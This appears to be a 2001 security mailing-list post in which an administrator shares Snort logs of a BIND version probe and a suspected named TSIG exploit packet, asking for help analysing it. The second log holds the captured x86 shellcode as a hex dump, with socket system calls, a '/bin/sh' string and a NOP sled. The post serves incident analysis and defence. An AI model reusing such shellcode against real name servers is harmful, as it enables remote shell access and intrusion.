Security Incidents mailing list archives
Named TSIG exploit ?
From: Mihai Moldovanu <mihaim () PROFM RO>
Date: Mon, 5 Feb 2001 20:19:40 +0200
I found on SNORT logs this: [**] IDS278 - SCAN -named Version probe [**] 02/01-09:30:18.672782 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800 len:0x48 141.85.31.233:1024 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF Len: 38 00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72 .............ver 73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03 sion.bind..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**] 02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800 len:0x22A 141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF Len: 520 00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83 ................ C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80 ..=....|........ 00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53 ....SIGNATURE.RS 41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00 A...4^........f. 00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89 .....F..F0.F.1.. 46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00 F .F..F$.f...... 00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00 ...N............ 00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45 .............5.E 03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00 ................ 00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73 ..._....../bin/s 68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05 h...7^j.j.j.jf.. 61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50 a.......j...P1.P 68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D h$....F.PRh..... 05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF ................ FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62 ....5.E......./b 69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90 in/sh........... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ The shellcode inside the second packet it's pretty strage . Anyone can take a deeper look at it ? Lead programmer, Mihai Moldovanu (mihaim () profm ro) WEB: http://tfm.profm.ro/ http://www.developers.ro/
Current thread:
- Named TSIG exploit ? Mihai Moldovanu (Feb 05)
- Re: Named TSIG exploit ? Paul Cardon (Feb 05)